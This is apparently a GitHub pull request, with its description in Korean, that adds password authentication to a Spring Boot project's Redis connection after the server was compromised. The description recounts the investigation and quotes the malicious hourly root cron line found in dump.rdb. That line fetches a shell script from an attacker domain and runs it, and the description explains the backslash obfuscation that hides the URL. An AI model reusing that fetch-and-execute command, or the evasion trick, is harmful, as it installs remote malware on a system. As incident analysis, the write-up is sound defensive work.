### PR TITLE
🔑 [feat] : 레디스 해킹 이슈 해결

### DIFF
--- a/.github/workflows/CD.yml
+++ b/.github/workflows/CD.yml
@@ -40,6 +40,7 @@ jobs:
           spring.mail.password: ${{secrets.MAIL_PASSWORD}}
           spring.data.redis.host: ${{secrets.REDIS_HOST}}
           spring.data.redis.port: ${{secrets.REDIS_PORT}}
+          spring.data.redis.password: ${{secrets.REDIS_PASSWORD}}
 
 
       #gradlew 실행을 위한 권한 추가

--- a/.github/workflows/CI.yml
+++ b/.github/workflows/CI.yml
@@ -40,6 +40,8 @@ jobs:
           spring.mail.password: ${{secrets.MAIL_PASSWORD}}
           spring.data.redis.host: ${{secrets.REDIS_HOST}}
           spring.data.redis.port: ${{secrets.REDIS_PORT}}
+          spring.data.redis.password: ${{secrets.REDIS_PASSWORD}}
+
 
       #gradlew 실행을 위한 권한 추가
       - name: Grant execute permission for gradlew

--- a/src/main/java/com/swig/zigzzang/global/redis/RedisConfig.java
+++ b/src/main/java/com/swig/zigzzang/global/redis/RedisConfig.java
@@ -4,6 +4,7 @@ import org.springframework.beans.factory.annotation.Value;
 import org.springframework.context.annotation.Bean;
 import org.springframework.context.annotation.Configuration;
 import org.springframework.data.redis.connection.RedisConnectionFactory;
+import org.springframework.data.redis.connection.RedisStandaloneConfiguration;
 import org.springframework.data.redis.connection.lettuce.LettuceConnectionFactory;
 import org.springframework.data.redis.core.RedisTemplate;
 import org.springframework.data.redis.serializer.StringRedisSerializer;
@@ -16,9 +17,14 @@ public class RedisConfig {
     @Value("${spring.data.redis.host}")
     private String host;
 
+    @Value("${spring.data.redis.password}")
+    private String password;
+
     @Bean
     public RedisConnectionFactory redisConnectionFactory() {
-        return new LettuceConnectionFactory(host, port);
+        RedisStandaloneConfiguration config = new RedisStandaloneConfiguration(host, port);
+        config.setPassword(password);
+        return new LettuceConnectionFactory(config);
     }
 
     @Bean

--- a/src/main/resources/application.yml
+++ b/src/main/resources/application.yml
@@ -40,6 +40,7 @@ spring:
     redis:
       host: ${redis_host}
       port: ${redis_port}
+      password : ${redis_password}
 
 
 logging:


### PR DESCRIPTION
### 요약
레디스설정을 통해 해킹이슈를 해결하였습니다.
 
### 이상 현상의 원인을 찾아간 과정

직짱건강 서버에서 레디스 키 값을 조회 해 기존의 데이터가 전부 삭제되어있고 redis-cli 를 통해 keys * 로 확인해보니, 알수 없는 "backup1","backup2".. 등의 정보가 존재하는것을 알게 되었습니다.
![image](https://github.com/SWYP-3rd-period-1-team/zigzzang-backend/assets/58305106/c93f3e99-47c1-49d6-9af1-4ba6a9cd2858)


팀원중에 누군가 해당 키워드로 검색한 것인지 확인해봤으나 아무도 해당 키워드를 사용하지는 않았다고 하였습니다.

redis log를 확인해보니, 레디스에서 save 되는 명령어가 반복되었고, 해당 시점이 데이터가 날아간 시점이었습니다.

backup key에 저장된 값을 조회해보니, cron 명령어 형식이 들어있는 것을 보고, redis에서 자동으로 backup을 이런식으로 해주는구나로 생각해버리고 넘겼습니다.

하지만, redis에서 db를 backup하는 방식은 RDB 또는 AOF 방식입니다.

분명 RDB 형태로 데이터 셋을 스냅샷하여 저장하도록 설정해놨는데, 사용하지 않은 key가 redis에 set된 다는 것은 이상하다는 생각이 들었습니다.

dump.rdb 파일을 확인해보니, backup1, backup2, backup3 외에 이상한 python2 코드가 있는 것을 확인했습니다.

```python
# dump.rdb

@hourly root  python -c "import urllib2; print urllib2.urlopen('<http://ki>\\s\\s.a-d\\og.t\\op/t.sh').read()" >.1;chmod +x .1;./.1

...
```
urlopen을 하려는 url에서 \\ 를 제외해보면 http://kiss.a-dog.top/t.sh 입니다. (해당 링크에 접속하면 [t.sh](http://t.sh/) 파일이 다운로드 되니 누르지 마세요 !!)

여기서 해커가 \\ 를 사용한 이유는 자동으로 악의적인 도메인을 거르는 필터를 무력화시키고, python의 urllib2 라이브러리가 백슬래시를 무시하는 것을 악용한 것으로 확인하였습니다..

이 부분외에도, backup3, 2, 1에 저장되어 있는 value는 base64로 encode 되어있었습니다.

### 해결
원인으로는 파이썬 크롤 봇들이 하는 것으로 찾았고 포트 변경을 통해 막을수 있으나, 보안상 추가 설정정보를 추가하는것이 필요하겠다 싶어서 비밀번호를 추가하였습니다 ! 